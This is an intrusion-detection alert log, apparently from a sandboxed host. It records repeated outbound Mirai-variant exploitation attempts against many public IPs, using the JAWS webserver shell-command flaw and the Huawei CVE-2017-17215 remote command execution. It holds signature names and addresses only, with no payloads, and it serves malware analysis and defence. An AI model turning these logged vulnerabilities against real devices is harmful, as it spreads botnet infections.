                                                    2024-12-03T23:02:26.228730+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233951440.10.15.1180TCP
                                                    2024-12-03T23:02:26.228730+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233951440.10.15.1180TCP
                                                    2024-12-03T23:02:26.253165+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233724857.202.180.18380TCP
                                                    2024-12-03T23:02:26.253165+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233724857.202.180.18380TCP
                                                    2024-12-03T23:02:26.790884+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353768191.228.54.5380TCP
                                                    2024-12-03T23:02:26.790884+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353768191.228.54.5380TCP
                                                    2024-12-03T23:02:26.806691+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336828110.44.250.8280TCP
                                                    2024-12-03T23:02:26.806691+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336828110.44.250.8280TCP
                                                    2024-12-03T23:02:26.822745+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347880210.1.89.25580TCP
                                                    2024-12-03T23:02:26.822745+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347880210.1.89.25580TCP
                                                    2024-12-03T23:02:26.831922+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356370196.190.48.12680TCP
                                                    2024-12-03T23:02:26.831922+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356370196.190.48.12680TCP
                                                    2024-12-03T23:02:26.832077+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353562204.240.175.5280TCP
                                                    2024-12-03T23:02:26.832077+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353562204.240.175.5280TCP
                                                    2024-12-03T23:02:27.119123+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233357641.180.145.15337215TCP
                                                    2024-12-03T23:02:27.119124+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336220197.86.92.13837215TCP
                                                    2024-12-03T23:02:27.119139+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233793241.135.99.5837215TCP
                                                    2024-12-03T23:02:27.134788+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359386159.125.18.580TCP
                                                    2024-12-03T23:02:27.134788+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359386159.125.18.580TCP
                                                    2024-12-03T23:02:27.197385+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235561090.244.204.6280TCP
                                                    2024-12-03T23:02:27.197385+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235561090.244.204.6280TCP
                                                    2024-12-03T23:02:27.197458+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235785657.249.135.16780TCP
                                                    2024-12-03T23:02:27.197458+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235785657.249.135.16780TCP
                                                    2024-12-03T23:02:27.206585+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336856130.92.189.10880TCP
                                                    2024-12-03T23:02:27.206585+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336856130.92.189.10880TCP
                                                    2024-12-03T23:02:27.213008+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234567088.214.253.3080TCP
                                                    2024-12-03T23:02:27.213008+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234567088.214.253.3080TCP
                                                    2024-12-03T23:02:27.253450+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342192157.75.188.16780TCP
                                                    2024-12-03T23:02:27.253450+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342192157.75.188.16780TCP
                                                    2024-12-03T23:02:27.337972+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233890441.101.35.6237215TCP
                                                    2024-12-03T23:02:27.369454+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344964197.240.40.19037215TCP
                                                    2024-12-03T23:02:27.395369+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350132156.173.226.15337215TCP
                                                    2024-12-03T23:02:27.409967+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336900197.49.205.2937215TCP
                                                    2024-12-03T23:02:28.159608+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333066156.96.10.19737215TCP
                                                    2024-12-03T23:02:28.175287+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234066041.149.247.17737215TCP
                                                    2024-12-03T23:02:28.197382+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23605629.170.53.21180TCP
                                                    2024-12-03T23:02:28.197382+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23605629.170.53.21180TCP
                                                    2024-12-03T23:02:28.197506+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343416197.150.11.10237215TCP
                                                    2024-12-03T23:02:28.222183+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233740641.89.83.21937215TCP
                                                    2024-12-03T23:02:28.237809+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341204156.48.165.2937215TCP
                                                    2024-12-03T23:02:28.244351+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.236049641.114.115.8237215TCP
                                                    2024-12-03T23:02:28.268927+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235417499.6.29.12580TCP
                                                    2024-12-03T23:02:28.268927+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235417499.6.29.12580TCP
                                                    2024-12-03T23:02:28.275513+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235621442.101.107.7880TCP
                                                    2024-12-03T23:02:28.275513+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235621442.101.107.7880TCP
                                                    2024-12-03T23:02:28.284998+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355298167.195.228.18580TCP
                                                    2024-12-03T23:02:28.284998+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355298167.195.228.18580TCP
                                                    2024-12-03T23:02:28.300212+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234118458.181.107.13180TCP
                                                    2024-12-03T23:02:28.300212+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234118458.181.107.13180TCP
                                                    2024-12-03T23:02:28.322362+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338620124.240.76.13080TCP
                                                    2024-12-03T23:02:28.322362+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338620124.240.76.13080TCP
                                                    2024-12-03T23:02:28.322571+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235521697.131.151.13480TCP
                                                    2024-12-03T23:02:28.322571+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235521697.131.151.13480TCP
                                                    2024-12-03T23:02:28.362878+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340682146.78.192.10280TCP
                                                    2024-12-03T23:02:28.362878+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340682146.78.192.10280TCP
                                                    2024-12-03T23:02:28.369027+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357846218.160.198.6880TCP
                                                    2024-12-03T23:02:28.369027+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357846218.160.198.6880TCP
                                                    2024-12-03T23:02:28.409563+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333040130.195.228.12480TCP
                                                    2024-12-03T23:02:28.409563+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333040130.195.228.12480TCP
                                                    2024-12-03T23:02:28.409695+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355690212.164.197.4580TCP
                                                    2024-12-03T23:02:28.409695+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355690212.164.197.4580TCP
                                                    2024-12-03T23:02:28.763576+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234306645.203.146.19680TCP
                                                    2024-12-03T23:02:28.763576+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234306645.203.146.19680TCP
                                                    2024-12-03T23:02:29.087693+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343062100.47.39.6480TCP
                                                    2024-12-03T23:02:29.087693+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343062100.47.39.6480TCP
                                                    2024-12-03T23:02:29.097175+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235372243.37.19.6680TCP
                                                    2024-12-03T23:02:29.097175+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235372243.37.19.6680TCP
                                                    2024-12-03T23:02:29.119183+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345968118.88.160.20580TCP
                                                    2024-12-03T23:02:29.119183+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345968118.88.160.20580TCP
                                                    2024-12-03T23:02:29.119253+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235441657.9.56.3080TCP
                                                    2024-12-03T23:02:29.119253+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235441657.9.56.3080TCP
                                                    2024-12-03T23:02:29.145017+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346584195.194.204.14580TCP
                                                    2024-12-03T23:02:29.145017+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346584195.194.204.14580TCP
                                                    2024-12-03T23:02:29.158908+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355514120.51.53.21280TCP
                                                    2024-12-03T23:02:29.158908+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355514120.51.53.21280TCP
                                                    2024-12-03T23:02:29.417055+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235507241.25.101.19637215TCP
                                                    2024-12-03T23:02:29.463788+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233479241.246.226.22637215TCP
                                                    2024-12-03T23:02:29.463792+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345180156.168.222.5537215TCP
                                                    2024-12-03T23:02:29.488742+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235611441.126.42.8537215TCP
                                                    2024-12-03T23:02:29.495197+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340606120.96.167.780TCP
                                                    2024-12-03T23:02:29.495197+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340606120.96.167.780TCP
                                                    2024-12-03T23:02:29.504120+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233950041.55.74.2637215TCP
                                                    2024-12-03T23:02:29.504141+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346838156.9.148.3037215TCP
                                                    2024-12-03T23:02:29.526313+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350792220.24.222.24780TCP
                                                    2024-12-03T23:02:29.526313+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350792220.24.222.24780TCP
                                                    2024-12-03T23:02:29.526338+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359450122.191.41.17680TCP
                                                    2024-12-03T23:02:29.526338+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359450122.191.41.17680TCP
                                                    2024-12-03T23:02:29.535319+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233544293.210.77.24980TCP
                                                    2024-12-03T23:02:29.535319+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233544293.210.77.24980TCP
                                                    2024-12-03T23:02:29.535483+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234656047.31.48.9580TCP
                                                    2024-12-03T23:02:29.535483+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234656047.31.48.9580TCP
                                                    2024-12-03T23:02:29.566709+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235998692.182.109.13480TCP
                                                    2024-12-03T23:02:29.566709+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235998692.182.109.13480TCP
                                                    2024-12-03T23:02:29.566730+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352042205.62.181.15080TCP
                                                    2024-12-03T23:02:29.566730+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352042205.62.181.15080TCP
                                                    2024-12-03T23:02:30.244257+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336762181.2.206.15480TCP
                                                    2024-12-03T23:02:30.244257+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336762181.2.206.15480TCP
                                                    2024-12-03T23:02:30.244470+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335140161.104.243.11880TCP
                                                    2024-12-03T23:02:30.244470+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335140161.104.243.11880TCP
                                                    2024-12-03T23:02:30.253339+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350694135.50.4.17980TCP
                                                    2024-12-03T23:02:30.253339+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350694135.50.4.17980TCP
                                                    2024-12-03T23:02:30.284813+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338924208.102.194.8080TCP
                                                    2024-12-03T23:02:30.284813+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338924208.102.194.8080TCP
                                                    2024-12-03T23:02:30.284816+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348718131.216.31.15280TCP
                                                    2024-12-03T23:02:30.284816+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348718131.216.31.15280TCP
                                                    2024-12-03T23:02:30.300779+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234152641.255.131.6737215TCP
                                                    2024-12-03T23:02:30.322397+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335572156.221.148.13037215TCP
                                                    2024-12-03T23:02:30.331415+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359508197.42.73.25437215TCP
                                                    2024-12-03T23:02:30.331556+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342354197.160.205.25437215TCP
                                                    2024-12-03T23:02:30.394274+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235632441.48.66.19537215TCP
                                                    2024-12-03T23:02:30.447422+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234283041.243.14.5737215TCP
                                                    2024-12-03T23:02:30.603370+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348128197.222.172.4137215TCP
                                                    2024-12-03T23:02:30.603459+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.236062241.52.74.24137215TCP
                                                    2024-12-03T23:02:30.603677+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235698841.139.107.15737215TCP
                                                    2024-12-03T23:02:30.651609+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345232156.65.82.23837215TCP
                                                    2024-12-03T23:02:30.660952+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355928156.183.97.7737215TCP
                                                    2024-12-03T23:02:30.661030+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233948841.226.102.11637215TCP
                                                    2024-12-03T23:02:30.741957+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235652641.175.109.19737215TCP
                                                    2024-12-03T23:02:30.775320+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357744179.176.136.21780TCP
                                                    2024-12-03T23:02:30.775320+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357744179.176.136.21780TCP
                                                    2024-12-03T23:02:30.775420+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341870178.26.134.8780TCP
                                                    2024-12-03T23:02:30.775420+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341870178.26.134.8780TCP
                                                    2024-12-03T23:02:30.816306+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341808192.62.28.15480TCP
                                                    2024-12-03T23:02:30.816306+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341808192.62.28.15480TCP
                                                    2024-12-03T23:02:30.816309+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352688207.214.255.1580TCP
                                                    2024-12-03T23:02:30.816309+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352688207.214.255.1580TCP
                                                    2024-12-03T23:02:30.831402+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345936208.122.104.12980TCP
                                                    2024-12-03T23:02:30.831402+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345936208.122.104.12980TCP
                                                    2024-12-03T23:02:31.363530+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235321641.209.62.25437215TCP
                                                    2024-12-03T23:02:31.384783+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336564130.15.156.10180TCP
                                                    2024-12-03T23:02:31.384783+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336564130.15.156.10180TCP
                                                    2024-12-03T23:02:31.409655+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336694196.4.107.3480TCP
                                                    2024-12-03T23:02:31.409655+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336694196.4.107.3480TCP
                                                    2024-12-03T23:02:31.409841+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343436173.19.150.14580TCP
                                                    2024-12-03T23:02:31.409841+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343436173.19.150.14580TCP
                                                    2024-12-03T23:02:31.431854+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359218149.144.220.12280TCP
                                                    2024-12-03T23:02:31.431854+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359218149.144.220.12280TCP
                                                    2024-12-03T23:02:31.456563+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333606168.205.155.8780TCP
                                                    2024-12-03T23:02:31.456563+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333606168.205.155.8780TCP
                                                    2024-12-03T23:02:31.565866+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235510661.251.115.9580TCP
                                                    2024-12-03T23:02:31.565866+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235510661.251.115.9580TCP
                                                    2024-12-03T23:02:31.565876+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234965072.104.229.580TCP
                                                    2024-12-03T23:02:31.565876+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234965072.104.229.580TCP
                                                    2024-12-03T23:02:31.566082+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335586153.41.160.1980TCP
                                                    2024-12-03T23:02:31.566082+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335586153.41.160.1980TCP
                                                    2024-12-03T23:02:31.572314+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340006197.221.243.18680TCP
                                                    2024-12-03T23:02:31.572314+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340006197.221.243.18680TCP
                                                    2024-12-03T23:02:31.572470+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23409061.99.148.15280TCP
                                                    2024-12-03T23:02:31.572470+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23409061.99.148.15280TCP
                                                    2024-12-03T23:02:31.572575+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345718108.245.0.4780TCP
                                                    2024-12-03T23:02:31.572575+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345718108.245.0.4780TCP
                                                    2024-12-03T23:02:31.582000+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233895857.17.247.4880TCP
                                                    2024-12-03T23:02:31.582000+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233895857.17.247.4880TCP
                                                    2024-12-03T23:02:32.347346+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354046156.187.167.9637215TCP
                                                    2024-12-03T23:02:32.525542+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355664220.202.214.7380TCP
                                                    2024-12-03T23:02:32.525542+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355664220.202.214.7380TCP
                                                    2024-12-03T23:02:32.572282+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354930119.229.42.4380TCP
                                                    2024-12-03T23:02:32.572282+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354930119.229.42.4380TCP
                                                    2024-12-03T23:02:32.572286+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355488135.106.99.2980TCP
                                                    2024-12-03T23:02:32.572286+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355488135.106.99.2980TCP
                                                    2024-12-03T23:02:32.572379+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355326208.23.123.18480TCP
                                                    2024-12-03T23:02:32.572379+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355326208.23.123.18480TCP
                                                    2024-12-03T23:02:32.597376+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338294142.129.100.22380TCP
                                                    2024-12-03T23:02:32.597376+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338294142.129.100.22380TCP
                                                    2024-12-03T23:02:33.448079+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234730841.172.169.19937215TCP
                                                    2024-12-03T23:02:33.573363+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340024156.64.117.25037215TCP
                                                    2024-12-03T23:02:33.619549+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350898197.75.48.20737215TCP
                                                    2024-12-03T23:02:33.628313+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334272197.195.135.16337215TCP
                                                    2024-12-03T23:02:33.628420+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333738197.193.244.22837215TCP
                                                    2024-12-03T23:02:33.628525+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357056197.74.174.16937215TCP
                                                    2024-12-03T23:02:33.659588+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235365841.178.156.2237215TCP
                                                    2024-12-03T23:02:33.659764+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349344156.89.113.1937215TCP
                                                    2024-12-03T23:02:33.775493+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357452122.238.169.22480TCP
                                                    2024-12-03T23:02:33.775493+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357452122.238.169.22480TCP
                                                    2024-12-03T23:02:33.822326+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354742192.24.226.13780TCP
                                                    2024-12-03T23:02:33.822326+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354742192.24.226.13780TCP
                                                    2024-12-03T23:02:33.822495+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359844189.161.132.8980TCP
                                                    2024-12-03T23:02:33.822495+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359844189.161.132.8980TCP
                                                    2024-12-03T23:02:33.831582+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352202160.86.170.8880TCP
                                                    2024-12-03T23:02:33.831582+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352202160.86.170.8880TCP
                                                    2024-12-03T23:02:33.853654+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360772116.227.243.10080TCP
                                                    2024-12-03T23:02:33.853654+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360772116.227.243.10080TCP
                                                    2024-12-03T23:02:33.853756+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235647041.247.11.23480TCP
                                                    2024-12-03T23:02:33.853756+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235647041.247.11.23480TCP
                                                    2024-12-03T23:02:33.863286+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360118132.193.129.16680TCP
                                                    2024-12-03T23:02:33.863286+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360118132.193.129.16680TCP
                                                    2024-12-03T23:02:33.878990+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338302124.201.144.16780TCP
                                                    2024-12-03T23:02:33.878990+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338302124.201.144.16780TCP
                                                    2024-12-03T23:02:34.378502+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350118200.139.81.24880TCP
                                                    2024-12-03T23:02:34.378502+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350118200.139.81.24880TCP
                                                    2024-12-03T23:02:34.447299+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360666197.210.191.9737215TCP
                                                    2024-12-03T23:02:34.447395+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333272156.115.140.15337215TCP
                                                    2024-12-03T23:02:34.447522+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357180197.55.185.9337215TCP
                                                    2024-12-03T23:02:34.463046+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235736241.0.42.9537215TCP
                                                    2024-12-03T23:02:34.463248+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349334197.97.70.14637215TCP
                                                    2024-12-03T23:02:34.478839+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350226197.142.11.19137215TCP
